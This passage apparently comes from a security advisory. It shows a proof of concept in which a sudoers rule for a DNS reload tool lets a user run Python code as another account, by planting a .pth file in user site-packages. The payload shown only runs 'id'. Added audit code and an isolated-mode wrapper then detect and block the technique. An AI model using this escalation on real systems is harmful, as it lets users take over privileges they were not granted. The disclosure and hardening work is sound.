Proof of concept:
/etc/sudoers contains:
%dns_simon ALL=(dns_zonefiles) NOPASSWD: /home/dns/zonefiles/bin/dns-reload simon
Prepare Python code, as the calling user, that the interpreter will run automatically:
$ mkdir -p "$HOME/.local/lib/python3.5/site-packages/exploit"
$ echo "import subprocess" > "$HOME/.local/lib/python3.5/site-packages/exploit/__init__.py"
$ echo "subprocess.run(['id'])" >> "$HOME/.local/lib/python3.5/site-packages/exploit/__init__.py"
$ echo "import exploit" > "$HOME/.local/lib/python3.5/site-packages/exploit.pth"
Calling user's credentials:
$ id
uid=1001(simon) gid=1001(simon) groups=1001(simon),100(users),1007(dns_simon)
Exploit script executing with the target (called) user's credentials:
$ sudo -u dns_zonefiles /home/dns/zonefiles/bin/dns-reload simon
uid=999(dns_zonefiles) gid=995(dns_zonefiles) groups=995(dns_zonefiles)
Without the Ubuntu patch:
$ sudo -u dns_zonefiles /home/dns/zonefiles/bin/dns-reload simon
Processing example.com...
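The proof of concept above depends on the interpreter honouring a user site-packages directory under a $HOME that still belongs to the calling user, and on .pth lines beginning with "import " being executed at startup. The following is an added example, not code from the original report or from the dns-reload tool, showing the checks a privilege-separated Python tool can run on itself to detect that situation and how to re-execute in isolated mode (-I, which implies -s and -E) so user site-packages is ignored. Function names, the constructed .pth contents and the sample paths are this example's own assumptions.

```python
"""Audit helpers for the user-site-packages injection path (added example).

Assumptions (not from the original report): function names, the constructed
sample .pth contents, and the example paths used in __main__.
"""
import os
import pwd
import site
import sys
from pathlib import Path


def home_mismatch(env_home, passwd_home):
    """True when $HOME points somewhere other than the effective user's passwd
    home directory, which is the precondition the proof of concept relies on.
    A missing $HOME is not a mismatch: site.py then falls back to passwd."""
    if env_home is None:
        return False
    return os.path.realpath(env_home) != os.path.realpath(passwd_home)


def read_pth_dir(site_dir):
    """Map .pth file name -> text for every .pth file in site_dir."""
    return {p.name: p.read_text(errors="replace")
            for p in Path(site_dir).glob("*.pth")}


def executable_pth_lines(pth_texts):
    """Return (file, line) pairs for .pth lines site.py would exec() at
    interpreter start: lines starting with 'import ' or 'import\\t'.
    Other non-comment lines are only added to sys.path."""
    findings = []
    for name in sorted(pth_texts):
        for line in pth_texts[name].splitlines():
            if line.startswith(("import ", "import\t")):
                findings.append((name, line.rstrip()))
    return findings


def hardened_argv(script, *args):
    """Argument vector to re-run a script in isolated mode: -I disables the
    user site directory (-s) and ignores PYTHON* environment variables (-E)."""
    return [sys.executable, "-I", str(script), *args]


def audit(environ=None, euid=None):
    """Collect human-readable findings about the running interpreter."""
    environ = os.environ if environ is None else environ
    euid = os.geteuid() if euid is None else euid
    findings = []
    try:
        passwd_home = pwd.getpwuid(euid).pw_dir
    except KeyError:
        passwd_home = None
    env_home = environ.get("HOME")
    if passwd_home is not None and home_mismatch(env_home, passwd_home):
        findings.append("HOME=%s but passwd home is %s" % (env_home, passwd_home))
    if site.ENABLE_USER_SITE:
        user_site = site.getusersitepackages()
        findings.append("user site-packages enabled: %s" % user_site)
        if os.path.isdir(user_site):
            for name, line in executable_pth_lines(read_pth_dir(user_site)):
                findings.append("%s executes at startup: %s" % (name, line))
    return findings


if __name__ == "__main__":
    # Constructed sample mirroring the report's exploit.pth (not a real file).
    sample = {"exploit.pth": "import exploit\n", "vendor.pth": "/opt/vendor/lib\n"}
    print("sample .pth lines that would execute:", executable_pth_lines(sample))
    for finding in audit():
        print("finding:", finding)
    print("hardened re-exec:", " ".join(hardened_argv("/home/dns/zonefiles/bin/dns-reload", "simon")))
```

A wrapper that runs the real tool through hardened_argv() (or a shebang of `#!/usr/bin/python3 -I`) removes the dependency on what $HOME contains; the audit() findings are what to log when a tool is invoked with a foreign HOME or with executable .pth lines present.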